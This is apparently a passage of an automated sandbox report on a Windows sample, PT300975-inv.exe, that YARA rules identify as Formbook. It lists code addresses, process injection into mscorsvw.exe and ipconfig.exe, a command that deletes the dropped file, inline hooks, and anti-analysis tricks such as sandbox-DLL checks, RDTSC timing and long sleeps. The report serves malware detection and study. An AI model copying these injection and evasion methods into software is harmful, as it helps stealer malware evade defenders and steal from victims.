Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE4330 0_2_02DE4330
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DEA0AF 0_2_02DEA0AF
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE24A9 0_2_02DE24A9
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE3012 0_2_02DE3012
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DEF988 0_2_02DEF988
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DEF981 0_2_02DEF981
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE7EA0 0_2_02DE7EA0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE5DF0 0_2_02DE5DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041D8D2 2_2_0041D8D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041E197 2_2_0041E197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041D313 2_2_0041D313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00402D87 2_2_00402D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00409E40 2_2_00409E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041D63C 2_2_0041D63C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00409E3F 2_2_00409E3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041DF97 2_2_0041DF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041DFAA 2_2_0041DFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B1D55 2_2_057B1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056E0D20 2_2_056E0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B2D07 2_2_057B2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FD5E0 2_2_056FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B25DD 2_2_057B25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05712581 2_2_05712581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056F841F 2_2_056F841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B1FF1 2_2_057B1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05706E30 2_2_05706E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B2EF7 2_2_057B2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05704120 2_2_05704120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056EF900 2_2_056EF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057A1002 2_2_057A1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B28EC 2_2_057B28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057120A0 2_2_057120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B20A8 2_2_057B20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_056FB090 2_2_056FB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B2B28 2_2_057B2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057ADBD2 2_2_057ADBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0571EBB0 2_2_0571EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057B22AE 2_2_057B22AE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03532B28 4_2_03532B28
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352DBD2 4_2_0352DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349EBB0 4_2_0349EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035322AE 4_2_035322AE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346F900 4_2_0346F900
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03484120 4_2_03484120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03521002 4_2_03521002
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0353E824 4_2_0353E824
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035328EC 4_2_035328EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347B090 4_2_0347B090
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034920A0 4_2_034920A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035320A8 4_2_035320A8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03531FF1 4_2_03531FF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352D616 4_2_0352D616
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03486E30 4_2_03486E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03532EF7 4_2_03532EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03531D55 4_2_03531D55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03532D07 4_2_03532D07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03460D20 4_2_03460D20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035325DD 4_2_035325DD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347D5E0 4_2_0347D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352D466 4_2_0352D466
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347841F 4_2_0347841F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009AE197 4_2_009AE197
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00992D90 4_2_00992D90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00992D87 4_2_00992D87
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00999E3F 4_2_00999E3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00999E40 4_2_00999E40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ADF97 4_2_009ADF97
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_00992FB0 4_2_00992FB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ADFAA 4_2_009ADFAA
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 0346B150 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: String function: 056EB150 appears 35 times
Sample file is different than original file name gathered from version info
Source: PT300975-inv.exe Binary or memory string: OriginalFilename vs PT300975-inv.exe
Source: PT300975-inv.exe, 00000000.00000002.345433163.0000000003039000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe4.dll. vs PT300975-inv.exe
Source: PT300975-inv.exe, 00000000.00000002.344599838.0000000000C52000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameuse5.exeH vs PT300975-inv.exe
Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDESdgdhser.dll0 vs PT300975-inv.exe
Source: PT300975-inv.exe, 00000000.00000002.346817865.00000000055B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs PT300975-inv.exe
Source: PT300975-inv.exe Binary or memory string: OriginalFilenameuse5.exeH vs PT300975-inv.exe
Yara signature match
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@5/3
Source: C:\Users\user\Desktop\PT300975-inv.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT300975-inv.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
Source: PT300975-inv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PT300975-inv.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: PT300975-inv.exe ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Users\user\Desktop\PT300975-inv.exe 'C:\Users\user\Desktop\PT300975-inv.exe'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PT300975-inv.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: PT300975-inv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PT300975-inv.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.364673964.0000000007AA0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: mscorsvw.exe, 00000002.00000002.385641930.00000000057DF000.00000040.00000001.sdmp, ipconfig.exe, 00000004.00000002.605193019.000000000355F000.00000040.00000001.sdmp
Source: Binary string: mscorsvw.pdb source: ipconfig.exe, 00000004.00000002.605597251.000000000396F000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: mscorsvw.exe, ipconfig.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.364673964.0000000007AA0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE0B8C pushfd ; ret 0_2_02DE0B8D
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE3008 pushad ; iretd 0_2_02DE3011
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041CEB5 push eax; ret 2_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041CF6C push eax; ret 2_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041CF02 push eax; ret 2_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0041CF0B push eax; ret 2_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0573D0D1 push ecx; ret 2_2_0573D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034BD0D1 push ecx; ret 4_2_034BD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009AD856 push esi; ret 4_2_009AD859
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ACEB5 push eax; ret 4_2_009ACF08
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ACF0B push eax; ret 4_2_009ACF72
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ACF02 push eax; ret 4_2_009ACF08
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009ACF6C push eax; ret 4_2_009ACF72

Persistence and Installation Behavior:

barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\PT300975-inv.exe File opened: C:\Users\user\Desktop\PT300975-inv.exe:Zone.Identifier read attributes | delete Jump to behavior
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xEE
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL!:ZONE.IDENTIFIER
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000009998E4 second address: 00000000009998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000000999B5E second address: 0000000000999B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00409A90 rdtsc 2_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\PT300975-inv.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\PT300975-inv.exe TID: 7128 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PT300975-inv.exe TID: 7144 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6584 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6584 Thread sleep time: -68000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4004 Thread sleep time: -70000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.365372094.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.361158752.0000000006417000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.365372094.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
